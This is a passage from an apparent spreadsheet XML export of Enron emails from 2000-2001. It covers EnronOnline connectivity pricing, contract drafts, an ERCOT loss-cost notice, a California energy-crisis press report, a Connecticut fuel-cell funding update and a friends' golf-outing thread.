EnronOnline transactions may obtain a direct connect to EnronOnline through _x000D_
EBS for $1750 per month._x000D_
All direct connect customers will be responsible for providing a router that _x000D_
can accept a T-1 circuit._x000D_
All direct connect customers will receive a Service Agreement from EBS that _x000D_
will specify the terms of the service._x000D_
_x000D_
I would like to begin contacting these customers ASAP so please contact me _x000D_
with any issues by noon on August 21, 2000.  _x000D_
_x000D_
Attached is a spreadsheet that outlines the EnronOnline funded participants _x000D_
in the pilot program._x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 09:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Equity Swap Confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon Sara,_x000D_
_x000D_
Please disregard the earlier e-mail attachment. I made an additional change. _x000D_
This is hopefully the final draft._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jorge_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Feb 2000 04:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Helsinki</t>
  </si>
  <si>
    <t>Sharron,_x000D_
_x000D_
Please find attached the presentation for the meeting on Helsinki with Joe _x000D_
Sutton at 8.30am (there have been some minor changes from earlier versions). _x000D_
Would you print off enough colour copies for the Houston attendees?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I also attach a supplementary document which may not be required in the _x000D_
meeting, but it would be useful if a number of copies could be to hand just _x000D_
in case._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Many thanks_x000D_
_x000D_
_x000D_
Fernley</t>
  </si>
  <si>
    <t>Wed, 26 Dec 2001 14:51:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'samantha.law@enron.com'})</t>
  </si>
  <si>
    <t>ERV Notification:  (Power West Price Peak - 12/26/2001)</t>
  </si>
  <si>
    <t>The report named: Power West Price Peak &lt;http://erv.corp.enron.com/linkFromExcel.asp?report_cd=30&amp;report_name=Power+West+Price+Peak&amp;category_cd=6&amp;category_name=WEST&amp;toc_hide=1&amp;sTV1=6&amp;TV1Exp=Y&amp;current_efct_date=12/26/2001&gt;, published as of 12/26/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 05:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FPL PPA</t>
  </si>
  <si>
    <t xml:space="preserve">I'm remembering now.  It was a term sheet which was never executed, as far as _x000D_
I know.  I believe FPL prepared it, and we may have commented on it. Let me _x000D_
see what I can find._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ben F Jacoby @ ECT                           05/16/2001 12:09 PM_x000D_
	_x000D_
_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: FPL PPA  _x000D_
_x000D_
It was a deal Ozzie was working on with FPL._x000D_
_x000D_
_x000D_
_x000D_
Kay Mann@ENRON_x000D_
05/16/2001 12:04 PM_x000D_
To: Ben F Jacoby/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: FPL PPA  _x000D_
_x000D_
I don't remember a PPA for Homestead.  I'll check, though.  _x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ben F Jacoby @ ECT                           05/16/2001 12:03 PM_x000D_
	_x000D_
_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: FPL PPA_x000D_
_x000D_
Kay:_x000D_
_x000D_
A while ago, you sent me a copy of an FPL PPA for Homestead. Could you please _x000D_
resend me the document?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 02:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>more kayak</t>
  </si>
  <si>
    <t>www.dagger.com.... and look at the Products, Recreational Kayaks section._x000D_
_x000D_
I am selling my Bayou II kayak by Dagger.  It is a two person, enclosed _x000D_
style, kayak perfect for enjoyable kayaking with a special friend or family _x000D_
member.  Especially good for fishing because one person can paddle and _x000D_
position the boat while the other fishes.  Fast and extremely quiet!!!_x000D_
_x000D_
$749 Retail(camo $50 extra), will sell for $ 550_x000D_
2 person, tandem_x000D_
polyethylene outer layer_x000D_
camoflage color_x000D_
wide cockpit and very stable_x000D_
bow seat slides and locks for single person use_x000D_
padded seats with adjustable back rests_x000D_
bow deck rigging with recessed fittings_x000D_
carry toggles(handles)_x000D_
includes bow and stern inflatable flotation inserts_x000D_
weighs 65 lbs_x000D_
13 ' 6 " long_x000D_
Max Load 450 lbs.</t>
  </si>
  <si>
    <t>Sat, 27 Jan 2001 10:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ding.yuan@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve"> Hey Ding.  If you recall, we looked at Southern Cone during July, as this _x000D_
was the feedback that we got from our presentation in late May.  The Cuiaba _x000D_
gas and power volumes may be found in several different places since there is _x000D_
more than one model.  The models do not necessarily agree with each other.  I _x000D_
have attached a few models that should contain the necessary info.  I also _x000D_
have a summary sheet template that was to be attached in MAPS.  Enjoy._x000D_
_x000D_
-Kevin K._x000D_
_x000D_
   _x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 09:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Sample ENE Presentation</t>
  </si>
  <si>
    <t>Thank you very much for your help.</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 05:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Need Advice</t>
  </si>
  <si>
    <t xml:space="preserve">Tough time of day to dress for, but I think  you have it figured out._x000D_
_x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 10/03/2000 12:10 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Need Advice  _x000D_
_x000D_
6:00 p.m.-7pm with dinner at 7pm._x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	10/03/2000 12:05 PM_x000D_
		_x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Need Advice_x000D_
_x000D_
I would think cocktail attire.  What time are the receptions?_x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 10/03/2000 12:01 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Need Advice_x000D_
_x000D_
This seminar that Ric is going to in Las Vegas is having cocktail receptions _x000D_
each evening and special shows by Dana Carvey and Penn and Teller.  There's _x000D_
no dress specified, so I'm assuming something nice but not overdone.  What _x000D_
would you think?  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 07:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'laura.lantefield@enron.com'})</t>
  </si>
  <si>
    <t>Re: Keyex Customer Invitation List</t>
  </si>
  <si>
    <t xml:space="preserve">Here's TW's info.  Call me if you have questions._x000D_
thanks_x000D_
Kevin Hyatt_x000D_
713-853-5559_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>October Loss Cost</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Doug Gilbert-Smith/Corp/Enron on _x000D_
10/02/2000 04:23 PM ---------------------------_x000D_
_x000D_
_x000D_
"Evans, Doug" &lt;DEvans@ercot.com&gt; on 10/02/2000 04:02:30 PM_x000D_
To: 1 ERCOT Staff &lt;ercotStaff@ercot.com&gt;, 1 ESC &lt;esc@ercot.com&gt;, 1 RSS _x000D_
&lt;rss@ercot.com&gt;, 1 TAC &lt;tac@ercot.com&gt;, 1 TMOS &lt;tmos@ercot.com&gt;, 1 Oasis _x000D_
Subscribers &lt;oasissub@ercot.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: October Loss Cost_x000D_
_x000D_
_x000D_
The ERCOT Monthly Loss Cost per MWH for the month of October 2000 is $55.65._x000D_
_x000D_
A history of the ERCOT Monthly Loss Cost is posted on._x000D_
ftp://ftp.ercot-iso.com/inside.htm_x000D_
_x000D_
Trick or treat/Happy Halloween,_x000D_
Doug Evans_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 09:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Change order #2,</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 10/13/2000 04:09 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kay Mann                           10/13/2000 04:08 PM_x000D_
	_x000D_
_x000D_
To: lee.johnson@ss.ps.ge_x000D_
cc: kent.shoemaker@ae.ge.com, Ben Jacoby/HOU/ECT@ECT _x000D_
_x000D_
Subject: Change order #2,_x000D_
_x000D_
Lee,_x000D_
_x000D_
Here's a revised draft incorporating your two suggestions:_x000D_
_x000D_
_x000D_
_x000D_
I've forwarded what I have on the CO (#3) for South America to their lawyer, _x000D_
so I hope it will be wrapped up soon._x000D_
_x000D_
I've seen reference to the Pleasanton CO, and I know it is in the works as _x000D_
well.  It is percolating through the system.  _x000D_
_x000D_
Do you have the electronic file for the LV CoGen change order (#4), extending _x000D_
the delivery dates?_x000D_
_x000D_
I'll be in on Monday, although I have a heavy conference call schedule.  I'll _x000D_
be easiest to catch towards the end of the day._x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'ray.alvarez@enron.com', 'kevin.hughes@enron.com', 'steve.walton@enron.com', 'robert.neustaedter@enron.com', 'tony.spruiell@enron.com', 'kathryn.corbally@enron.com', 'gordon.savage@enron.com', 'erika.dupre@enron.com', 'kathy.bass@enron.com', 'richard.zdunkewicz@enron.com', 'angela.schwarz@enron.com', 'richard.sanders@enron.com', 'gfergus@brobeck.com', 'paul.kaufman@enron.com', 'jeremy.blachman@enron.com', 'mark.fillinger@enron.com', 'harry.kingerski@enron.com', 'mark.muller@enron.com', 'tanya.leslie@enron.com', 'leticia.botello@enron.com', 'james.lewis@enron.com', 'james.wright@enron.com', 'greg.wolfe@enron.com', 'tamara.johnson@enron.com', 'robert.williams@enron.com', 'jeff.messina@enron.com', 'sandra.mccubbin@enron.com', 'eric.melvin@enron.com', 'neil.hong@enron.com', 'jennifer.rudolph@enron.com', 'triley@enron.com', 'harold.buchanan@enron.com', 'wgang@enron.com', 'linda.robertson@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.com', 'jklauber@llgm.com', 'mpalmer@enron.com', 'michael.etringer@enron.com', 'rosalinda.tijerina@enron.com', 'psmith3@enron.com', 'ginger.dernehl@enron.com', 'susan.mara@enron.com', 'scott.stoness@enron.com', 'ted.murphy@enron.com', 'mjackso7@enron.com', 'dan.leff@enron.com', 'phillip.allen@enron.com', 'beverly.aden@enron.com', 'wanda.curry@enron.com', 'dwatkiss@bracepatt.com', 'steve.walker@enron.com', 'chris.foster@enron.com', 'vicki.sharp@enron.com', 'ren@enron.com', 'jeff.dasovich@enron.com', 'martin.wenzel@enron.com', 'tasha.lair@enron.com', 'lazure@enron.com', 'kathy.dodgen@enron.com', 'rcarroll@bracepatt.com', 'alan.comnes@enron.com', 'terri.greenlee@enron.com', 'tim.belden@enron.com', 'christian.yoder@enron.com', 'marsha.suggs@enron.com', 'richard.leibert@enron.com', 'michael.mann@enron.com', 'sarah.novosel@enron.com', 'gayle.muench@enron.com', 'don.black@enron.com', 'rita.hennessy@enron.com', 'scott.gahn@enron.com', 'michelle.cisneros@enron.com', 'leslie.lawner@enron.com', 'mike.smith@enron.com', 'craig.sutter@enron.com', 'christina.liscano@enron.com', 'janel.guerrero@enron.com', 'tracy.ngo@enron.com', 'fran.deltoro@enron.com', 'meredith.eggleston@enron.com', 'cathy.corbin@enron.com', 'vladimir.gorny@enron.com', 'ken.gustafson@enron.com', 'neil.bresnan@enron.com', 'skean@enron.com', 'iris.waser@enron.com', 'donna.fulton@enron.com', 'robert.badeer@enron.com', 'mary.hain@enron.com', 'bruno.gaillard@enron.com', 'dennis.benevides@enron.com', 'michael.tribolet@enron.com', 'richard.shapiro@enron.com', 'sharon.dick@enron.com', 'edward.sacks@enron.com', 'joseph.alamo@enron.com', 'carol.moffett@enron.com', 'leasa.lopez@enron.com', 'debora.whitehead@enron.com', 'douglas.huth@enron.com', 'dirk.vanulden@enron.com', 'christopher.calger@enron.com', 'james.steffes@enron.com', 'jubran.whalan@enron.com', 'evan.hughes@enron.com', 'jess.hewitt@enron.com', 'joe.hartsoe@enron.com', 'brenda.barreda@enron.com', 'bill.votaw@enron.com'})</t>
  </si>
  <si>
    <t>State Controller Kathleen Connell Press Conference</t>
  </si>
  <si>
    <t xml:space="preserve">A report from ARM's PR firm to the ARM members._x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 03/21/2001 04:12 PM -----_x000D_
_x000D_
	"Beiser, Megan" &lt;Megan.Beiser@edelman.com&gt;_x000D_
	03/21/2001 03:00 PM_x000D_
		 _x000D_
		 To: "Aaron Thomas (E-mail) (E-mail)" &lt;athomas@newenergy.com&gt;, "Andrea Weller _x000D_
(E-mail) (E-mail)" &lt;aweller@sel.com&gt;, "andrew Chau (E-mail) (E-mail)" _x000D_
&lt;anchau@shellus.com&gt;, "Bill Chen (E-mail) (E-mail)" &lt;bchen@newenergy.com&gt;, _x000D_
"Douglas Oglesby (E-mail) (E-mail)" &lt;doao@chevron.com&gt;, "Fairchild, Tracy" _x000D_
&lt;tracy.fairchild@edelman.com&gt;, "Jeffrey Hanson (E-mail) (E-mail)" _x000D_
&lt;jeff.hanson@phaser.com&gt;, "jennifer Chamberlin (E-mail) (E-mail)" _x000D_
&lt;jnnc@chevron.com&gt;, "john Barthrop (E-mail) (E-mail)" _x000D_
&lt;jbarthrop@electric.com&gt;, "John Leslie (E-mail) (E-mail)" &lt;jleslie@luce.com&gt;, _x000D_
"Joseph Alamo (E-mail) (E-mail)" &lt;jalamo@enron.com&gt;, "Manuel, Erica" _x000D_
&lt;Erica.Manuel@edelman.com&gt;, "'Michael Nelson' (E-mail)" _x000D_
&lt;mnelson@electric.com&gt;, "Peter Bray (E-mail) (E-mail)" &lt;pbray@newpower.com&gt;, _x000D_
"Rebecca Schlanert (E-mail) (E-mail)" &lt;rschlanert@electric.com&gt;, "Richard _x000D_
Counihan (E-mail) (E-mail)" &lt;rick.counihan@greenmountain.com&gt;, "'Robert _x000D_
Morgan' (E-mail)" &lt;rmorgan@newenergy.com&gt;, "Sue Mara (E-mail) (E-mail)" _x000D_
&lt;smara@enron.com&gt;, "Allen, Stevan" &lt;stevan.allen@edelman.com&gt;, _x000D_
arm@phaser.com, "brbarkovich@earthlink.net" &lt;bbarkovich@earthlink.net'&gt;, _x000D_
cra@calretailers.com, dennis.flatt@kp.org, dhunter@smithandkempton.com, _x000D_
djsmith@smithandkempton.com, Dominic.DiMare@calchamber.com, _x000D_
drothrock@cmta.net, gharrison@calstate.edu, hgovenar@govadv.com, _x000D_
jackson_gualco@gualcogroup.com, ken_pietrelli@ocli.com, kgough@calpine.com, _x000D_
kmccrea@sablaw.com, kmills@cfbf.com, lhastings@cagrocers.com, mday@gmssr.com, _x000D_
mmoretti@calhealth.org, nplotkin@tfglobby.com, randy_britt@robinsonsmay.com, _x000D_
richard.seguin@kp.org, RochmanM@spurr.org, rrichter@calhealth.org, _x000D_
sgovenar@govadv.com, smccubbi@enron.com, spahnn@hnks.com, theo@ppallc.com, _x000D_
vincent.stewart@ucop.edu, vjw@ceert.org, "Warner, Jami" _x000D_
&lt;jami.warner@edelman.com&gt;, wbooth@booth-law.com, wbrown@lhom.com, _x000D_
wlarson@calstate.edu_x000D_
		 cc: _x000D_
		 Subject: State Controller Kathleen Connell Press Conference_x000D_
_x000D_
_x000D_
_x000D_
&gt; State Controller Kathleen Connell held a press conference today to voice_x000D_
&gt; her concerns over electricity power purchases' effect on the State's_x000D_
&gt; general fund and in response to a letter received March 12 from Department_x000D_
&gt; of Finance Director Tim Gage and Chief Legislative Analyst Elizabeth Hill_x000D_
&gt; requesting a transfer of money from the General Fund._x000D_
&gt; _x000D_
&gt; Connell stated that Current financial information related to the purchase_x000D_
&gt; of electricity and the general fund is as follows:_x000D_
&gt; *State's general fund surplus has dropped from $8.5 billion in January to_x000D_
&gt; a current estimated level of $3.2 billion_x000D_
&gt; *Receipt of a letter from the Department of Finance Director and the Chief_x000D_
&gt; Legislative Analyst requesting an additional transfer of $5.6 billion to_x000D_
&gt; the Special Fund for Economic Uncertainties to cover power purchases_x000D_
&gt; *To cover this transfer, Connell said the state would have to borrow $2.4_x000D_
&gt; billion_x000D_
&gt; *Connell: "We started this year with a generous budget surplus; the energy_x000D_
&gt; crisis has taken much of that away, and this transfer on top of the_x000D_
&gt; electricity purchases would put the [General] fund at risk."_x000D_
&gt; *Debt issuance has not occurred to reimburse the General Fund for power_x000D_
&gt; purchases, while disbursements from the General Fund increase daily_x000D_
&gt; _x000D_
&gt; Controller Connell sent a letter to the Governor today, calling for the_x000D_
&gt; following steps to be taken:_x000D_
&gt; 1. DWR to notify the Controller's office of any purchases made and any_x000D_
&gt; contracts negotiated to date_x000D_
&gt; 2. DWR to notify the Controller's office of any future purchases and_x000D_
&gt; contracts within 7 days, regardless of when the invoices are submitted_x000D_
&gt; 3. Information on purchases in excess of $55 million  should be submitted_x000D_
&gt; within 24 hours_x000D_
&gt; 4. DWR should prepare new General Fund cash flow estimates for the next 30_x000D_
&gt; and 60 days, and for the end of the fiscal year_x000D_
&gt; 5. DWR should take action to ensure that bond sales are completed by the_x000D_
&gt; end of May 2001_x000D_
&gt; _x000D_
&gt; The Controller is also ordering an audit of the DWR resources to determine_x000D_
&gt; the amount of money being spent by the Department.  Currently, Connell_x000D_
&gt; said, "I have to rely on press reports as valid to determine the amount of_x000D_
&gt; money spent in power purchases."  She said she needs "acknowledgement of_x000D_
&gt; the total amount of liabilities made" by DWR. _x000D_
&gt; _x000D_
&gt; Megan Beiser_x000D_
&gt; Assistant Account Executive_x000D_
&gt; Edelman Public Relations Worldwide, Sacramento_x000D_
&gt; Phone: (916) 442-2331_x000D_
&gt; Fax: (916) 447-8509_x000D_
&gt; _x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Sep 2001 07:01:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Fuel Cells</t>
  </si>
  <si>
    <t>I am talking with Larry Cafero, Minority leader of House, and close personal friend of the Gov.  Initial feedback from Cafero is still positive.  I will likely, within the right timeframe given the WTC tragedy, schedule a meeting with Rowland personally.  I will advise when that will be.  I do agree with Dan's assessment. Don't panic yet. SM_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Allegretti, Daniel  _x000D_
Sent:	Monday, September 17, 2001 1:18 PM_x000D_
To:	Shapiro, Richard; Montovano, Steve_x000D_
Subject:	RE: Fuel Cells_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shapiro, Richard  _x000D_
Sent:	Monday, September 17, 2001 10:57 AM_x000D_
To:	Montovano, Steve; Allegretti, Daniel_x000D_
Subject:	Fuel Cells_x000D_
_x000D_
Did Connecticut reject our fuel cell project? If so, details?_x000D_
[Allegretti, Daniel]  _x000D_
_x000D_
Yes.  The DPUC issued a draft decision which declines to fund the project from the Conservation and Load Management Fund.  The decision praises the project in the text but includes a footnote which is critical of the project.  In addition, the DPUC issued a press release which is not helpful in promoting the project._x000D_
_x000D_
The decision not to fund out of the C&amp;LM fund was not unexpected.  The chairman of the DPUC has been very supportive, along with Governor Rowland, but has been working offline to fund the project instead from the Renewable Energy Investment Fund.  Although the REIF is a much smaller fund it appears the REIF is able to borrow against future receipts and is willing to do so based in part on their expectation of increased funding next legislative session.  We are meeting with the REIF director next Wednesday to confirm where this stands._x000D_
_x000D_
In the mean time we have filed exceptions to the draft decision which goes final tomorrow.  We are told that the offending footnote will be removed but that the decision not to commit the C&amp;LM fund will remain unchanged._x000D_
_x000D_
In sum, the project has suffered a very real setback but has not at this time been abandoned by EPMI.  Support from Rowland and others remains strong and EPMI would like to see if funding from the REIF this year is in fact viable.</t>
  </si>
  <si>
    <t>Thu, 8 Nov 2001 08:43:08 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Why Kingwood?</t>
  </si>
  <si>
    <t xml:space="preserve">As long as the two of you meet me in Tomball, I do not have a problem driving._x000D_
_x000D_
&gt;&gt;&gt; "Joe Ramirez" &lt;jramirez@othon.com&gt; 11/08/01 10:41AM &gt;&gt;&gt;_x000D_
Mark is driving. Good. I need to hitch a ride on that bus also._x000D_
_x000D_
-----Original Message-----_x000D_
From: Kevin [mailto:klyn@pdq.net]_x000D_
Sent: Thursday, November 08, 2001 10:28 AM_x000D_
To: Martinez, Ernesto Jr; Mark Molnar; Wolphguy@aol.com; Frthis@aol.com;_x000D_
siva66@mail.ev1.net; Rs1119@aol.com; Dutch.Quigley@enron.com;_x000D_
john_riches@msn.com; jramirez@othon.com; bwdunlavy@yahoo.com_x000D_
Subject: Re: Why Kingwood?_x000D_
_x000D_
Bitching is what I do, so I will continue to bitch.  Please look us up some_x000D_
sports bar near Texarkana so I can watch some NFL action after I kick your_x000D_
butts at golf.  Long live the Beaver!!!  Mark, your driving right...I think_x000D_
we need to leave at 4 am or so to make it to the border._x000D_
_x000D_
Smooches._x000D_
_x000D_
----- Original Message -----_x000D_
From: "Martinez, Ernesto Jr" &lt;martier@cpchem.com&gt;_x000D_
To: "Mark Molnar" &lt;MarkM@cajunusa.com&gt;; "'Kevin'" &lt;klyn@pdq.net&gt;;_x000D_
&lt;Wolphguy@aol.com&gt;; &lt;Frthis@aol.com&gt;; &lt;siva66@mail.ev1.net&gt;;_x000D_
&lt;Rs1119@aol.com&gt;; &lt;Dutch.Quigley@enron.com&gt;; &lt;john_riches@msn.com&gt;;_x000D_
&lt;jramirez@othon.com&gt;; &lt;bwdunlavy@yahoo.com&gt;_x000D_
Sent: Wednesday, November 07, 2001 6:46 PM_x000D_
Subject: Why Kingwood?_x000D_
_x000D_
_x000D_
&gt; Please read the message below (from Mark).  He asked about it, I looked it_x000D_
&gt; up and got us a tee time.  If anybody wants to get a tee time somewhere_x000D_
&gt; else, that is fine with me.  Just let me know so that I can cancel the tee_x000D_
&gt; times in Kingwood._x000D_
&gt;_x000D_
&gt; With Richard playing and the boys from Austin playing, I think that_x000D_
Kingwood_x000D_
&gt; is a happy medium.  We could try Brock park if that's what you guys want._x000D_
&gt; Who the hell lives by Brock?  I actually think that the drive to Kingwood_x000D_
is_x000D_
&gt; better than the drive into 5th ward or whatever ward it is._x000D_
&gt;_x000D_
&gt; I don't mind making a drive to play in Austin or Beaumont or Katy.  It's_x000D_
&gt; golf!!!!_x000D_
&gt;_x000D_
&gt; The DOG!_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Mark Molnar [mailto:MarkM@cajunusa.com]_x000D_
&gt; Sent: Wednesday, November 07, 2001 2:36 PM_x000D_
&gt; To: frthis@aol.com; wolphguy@aol.com; martier@cpchem.com;_x000D_
&gt; siva66@mail.ev1.net_x000D_
&gt; Subject: RE: seeing as mark won't answer my e-mails...._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; I heard an add on 610 for Kingwood Cove or something.  Do you have time to_x000D_
&gt; check it out?_x000D_
&gt;_x000D_
&gt; &gt;&gt;&gt; "Martinez, Ernesto Jr" &lt;martier@cpchem.com&gt; 11/07/01 02:26PM &gt;&gt;&gt;_x000D_
&gt;_x000D_
&gt; No.  They have a tournament on Sunday morning.  Their first available tee_x000D_
&gt; time is 1:15._x000D_
&gt; Damn, and I was hoping Mark would wear his Hillrod wig._x000D_
&gt;_x000D_
&gt; Sorry, any other suggestions?_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: siva66_x000D_
&gt; To: wolphguy@aol.com; martier@cpchem.com; siva66@mail.ev1.net; Mark Molnar_x000D_
&gt; Sent: 11/7/01 12:49 PM_x000D_
&gt; Subject: RE: seeing as mark won't answer my e-mails...._x000D_
&gt;_x000D_
&gt; did we get tee times?_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; ---------- Original Message ----------------------------------_x000D_
&gt; From: "Mark Molnar" &lt;MarkM@cajunusa.com&gt;_x000D_
&gt; Date: Wed, 07 Nov 2001 08:43:35 -0600_x000D_
&gt;_x000D_
&gt; &gt;Ernie, can you call and get us a few tee times at the Crosby_x000D_
&gt; Country Club.  Sounds like imbreedville to me, but let's give it a_x000D_
&gt; try._x000D_
&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; "siva66" &lt;siva66@mail.ev1.net&gt; 11/07/01 08:27AM &gt;&gt;&gt;_x000D_
&gt; &gt;that sounds good to me, everyone else agree?  we also need a head_x000D_
&gt; &gt;count, and ernie before long you'll take your usual position_x000D_
&gt; &gt;bringing up the rear.  once again, mark will not answer my e-_x000D_
&gt; &gt;mails......_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;---------- Original Message ----------------------------------_x000D_
&gt; &gt;From: "Martinez, Ernesto Jr" &lt;martier@cpchem.com&gt;_x000D_
&gt; &gt;Date: Tue, 6 Nov 2001 19:40:12 -0600_x000D_
&gt; &gt;_x000D_
&gt; &gt;&gt;Sunday morning is good for me.  As much as me and my colon will_x000D_
&gt; &gt;miss "Brock_x000D_
&gt; &gt;&gt;Dogs", I wouldn't mind another course.  There is a pretty nice_x000D_
&gt; &gt;course in_x000D_
&gt; &gt;&gt;Crosby (Newport Country Club) which would be accomodating for_x000D_
&gt; the_x000D_
&gt; &gt;blues man_x000D_
&gt; &gt;&gt;(Richard).  The shorter drive for him ensures that he doesn't_x000D_
&gt; get_x000D_
&gt; &gt;too much_x000D_
&gt; &gt;&gt;ass time which in turn allows me to kick more of it later that_x000D_
&gt; &gt;day.  Their_x000D_
&gt; &gt;&gt;weekend rate is $25.  They usually have an ad in the Chronicle_x000D_
&gt; &gt;Sports_x000D_
&gt; &gt;&gt;section._x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;For once in my life, all of you are looking UP to me!!!!!_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;-----Original Message-----_x000D_
&gt; &gt;&gt;From: Mark Molnar [mailto:MarkM@cajunusa.com]_x000D_
&gt; &gt;&gt;Sent: Tuesday, November 06, 2001 2:28 PM_x000D_
&gt; &gt;&gt;To: wolphguy@aol.com; martier@cpchem.com;_x000D_
&gt; Dutch.Quigley@enron.com;_x000D_
&gt; &gt;&gt;ras1119@hotmail.com; siva66@mail.ev1.net; jramirez@othon.com;_x000D_
&gt; &gt;&gt;klyn@pdq.net; bwdunlavy@yahoo.com_x000D_
&gt; &gt;&gt;Subject: Re: seeing as mark won't answer my e-mails...._x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;Sunday it is.  Let me know where ya'll want to play.  Treeline_x000D_
&gt; is_x000D_
&gt; &gt;right by_x000D_
&gt; &gt;&gt;my house, but we don't have to go there.  Somewhere in a central_x000D_
&gt; &gt;location_x000D_
&gt; &gt;&gt;for everyone is fine.  Throw out some names.  Early is good,_x000D_
&gt; that_x000D_
&gt; &gt;way we can_x000D_
&gt; &gt;&gt;watch my fantasy football kick someone's ass._x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;Mark Molnar_x000D_
&gt; &gt;&gt;Cajun Constructors, Inc._x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt;&gt; "Kevin" &lt;klyn@pdq.net&gt; 11/06/01 11:47AM &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;I thought we were all going somewhere on Sunday??? Mark???_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;----- Original Message -----_x000D_
&gt; &gt;&gt;From: "Joe Ramirez" &lt;jramirez@othon.com&gt;_x000D_
&gt; &gt;&gt;To: &lt;siva66@mail.ev1.net&gt;; &lt;bwdunlavy@yahoo.com&gt;;_x000D_
&gt; &gt;&lt;Dutch.Quigley@enron.com&gt;;_x000D_
&gt; &gt;&gt;&lt;martier@cpchem.com&gt;; &lt;wolphguy@aol.com&gt;; &lt;MarkM@cajunusa.com&gt;;_x000D_
&gt; &gt;&gt;&lt;ras1119@hotmail.com&gt;; &lt;klyn@pdq.net&gt;_x000D_
&gt; &gt;&gt;Sent: Tuesday, November 06, 2001 11:09 AM_x000D_
&gt; &gt;&gt;Subject: RE: seeing as mark won't answer my e-mails...._x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;&gt; I am in. What day? What time? Where? Can we get out there_x000D_
&gt; early?_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt; -----Original Message-----_x000D_
&gt; &gt;&gt;&gt; From: siva66 [mailto:siva66@mail.ev1.net]_x000D_
&gt; &gt;&gt;&gt; Sent: Tuesday, November 06, 2001 10:57 AM_x000D_
&gt; &gt;&gt;&gt; To: bwdunlavy@yahoo.com; Dutch.Quigley@enron.com;_x000D_
&gt; &gt;martier@cpchem.com;_x000D_
